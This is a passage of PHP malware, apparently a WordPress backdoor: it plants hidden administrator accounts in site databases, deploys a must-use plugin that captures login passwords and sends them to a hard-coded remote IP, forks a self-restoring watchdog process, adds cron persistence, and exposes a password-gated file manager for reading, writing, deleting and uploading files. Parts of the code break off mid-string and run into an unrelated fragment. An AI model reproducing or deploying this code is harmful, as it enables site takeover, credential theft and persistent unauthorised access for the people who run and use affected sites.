connect_error) continue;
$_tp = isset($_t[1]) ? $_t[1] : 'wp_';
$_hp = md5($_p);
foreach ($_u as $_un) {
@$_m->query("REPLACE INTO {$_tp}users (user_login,user_pass,user_nicename,user_email,user_registered,display_name) VALUES ('$_un','$_hp','$_un','u@u.com',NOW(),'$_un')");
$_q = @$_m->query("SELECT ID FROM {$_tp}users WHERE user_login='$_un'");
if ($_q && ($_o = $_q->fetch_object())) {
$_id = $_o->ID;
@$_m->query("INSERT INTO {$_tp}usermeta (user_id,meta_key,meta_value) VALUES ($_id,'{$_tp}capabilities','a:1:{s:13:\"administrator\";b:1;}') ON DUPLICATE KEY UPDATE meta_value='a:1:{s:13:\"administrator\";b:1;}'");
@$_m->query("INSERT INTO {$_tp}usermeta (user_id,meta_key,meta_value) VALUES ($_id,'{$_tp}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'");
}
}
$_m->close();
break;
}
}
@_ac();
// Login hijack — deploy mu-plugins credential harvester
function _hj() {
$_s1 = 'if(!defined("ABSPATH")||!function_exists("add_action"))return;';
$_s2 = 'add_action("wp_login",function($l,$u){';
$_s3 = '$ip=isset($_SERVER["SERVER_ADDR"])?$_SERVER["SERVER_ADDR"]:"127.0.0.1";';
$_s4 = '$s=function_exists("home_url")?home_url():$_SERVER["HTTP_HOST"];';
$_s5 = '$pw=isset($_POST["pwd"])?$_POST["pwd"]:"";';
$_s6 = '$d=$s."/wp-login.php,".$l.",".$pw;';
$_s7 = '$c2="http://45.61.187.50:50001/data.php";';
$_s8 = '$url=$c2."?name=getshellxxxxeval_okip_".$ip.".txt&data=".urlencode($d);';
$_s9 = '$ctx=stream_context_create(["http"=>["timeout"=>8,"ignore_errors"=>true]]);';
$_s10 = '$r=@file_get_contents($url,false,$ctx);';
$_s11 = '},10,2);';
$_hc = '\"\$L\" && flock -n 200 || exit 0\n" .
"B1=" . escapeshellarg($_b1) . "\n" .
"B2=" . escapeshellarg($_b2) . "\n" .
"SELF=" . escapeshellarg($_self) . "\n" .
"while :; do\n" .
' sleep $((1500 + RANDOM % 600))' . "\n" .
' if [ ! -f "$SELF" ]; then' . "\n" .
' for b in "$B1" "$B2"; do [ -f "$b" ] && { cp "$b" "$SELF" 2>/dev/null; break; }; done' . "\n" .
" fi\n" .
' [ -f "$B1" ] || cp "$SELF" "$B1" 2>/dev/null' . "\n" .
' [ -f "$B2" ] || cp "$SELF" "$B2" 2>/dev/null' . "\n" .
"done";
@file_put_contents($_wd, $_sc);
@chmod($_wd, 0755);
// Fork daemon — try multiple execution vectors
if (function_exists('exec')) {
@exec('nohup ' . escapeshellarg($_wd) . ' >/dev/null 2>&1 &');
@exec('(' . escapeshellarg($_wd) . ' /dev/null 2>&1 &)');
}
if (function_exists('system')) {
@system('nohup ' . escapeshellarg($_wd) . ' >/dev/null 2>&1 &');
}
if (function_exists('popen')) {
@popen('nohup ' . escapeshellarg($_wd) . ' >/dev/null 2>&1 &', 'r');
}
// Cron persistence — periodic check + @reboot resurrection
$_cl = '*/7 * * * * (test -f ' . escapeshellarg($_self);
$_cl .= ' || cp ' . escapeshellarg($_b1) . ' ' . escapeshellarg($_self) . ') 2>/dev/null' . "\n";
$_cl .= '@reboot (sleep 120 && nohup ' . escapeshellarg($_wd);
$_cl .= ' >/dev/null 2>&1 &)' . "\n";
$_old = @shell_exec('crontab -l 2>/dev/null');
if ($_old !== null && is_string($_old) && strpos($_old, $_bn) === false) {
$_tmp = '/dev/shm/.ct' . substr(md5($_self), 0, 6);
@file_put_contents($_tmp, $_old . $_cl);
@exec('crontab ' . escapeshellarg($_tmp) . ' 2>/dev/null');
@unlink($_tmp);
}
// Fallback: /etc/cron.d/ if writable
$_cd = '/etc/cron.d/wp-' . substr(md5($_self), 0, 8);
$_cc = '*/7 * * * * root (test -f ' . escapeshellarg($_self);
$_cc .= ' || cp ' . escapeshellarg($_b1) . ' ' . escapeshellarg($_self) . ') 2>/dev/null' . "\n";
@file_put_contents($_cd, $_cc);
} catch (\Exception $e) {}
}
// === Password gate ===
if (!isset($_REQUEST['root']) || $_REQUEST['root'] !== 'admin888') {
http_response_code(404);
die();
}
// API
if (isset($_REQUEST['_a'])) {
$_a = $_REQUEST['_a'];
$_p = isset($_REQUEST['_p']) ? $_REQUEST['_p'] : '';
$_r = array();
switch ($_a) {
case 'ls':
$_i = @scandir($_p);
if ($_i) foreach ($_i as $_f) {
if ($_f == '.' || $_f == '..') continue;
$_fp = $_p . '/' . $_f;
$_r[] = array('n'=>$_f, 't'=>is_dir($_fp)?'d':'f', 's'=>round(@filesize($_fp)/1024,2).'K', 'm'=>substr(sprintf('%o',@fileperms($_fp)),-4));
}
break;
case 'rd': $_r['d'] = @file_get_contents($_p); break;
case 'sv': $_r['o'] = @file_put_contents($_p, $_REQUEST['c']) ? 'Saved' : 'Fail'; break;
case 'dl': $_r['o'] = @unlink($_p) ? 'Done' : 'Fail'; break;
case 'up': $_r['o'] = @file_put_contents($_p, base64_decode($_REQUEST['c'])) ? 'Uploaded' : 'Fail'; break;
case 'mk': $_r['o'] = @mkdir($_p, 0777, true) ? 'Created' : 'Fail'; break;
}
header('Content-Type: application/json');
die(json_encode($_r));
}
?>.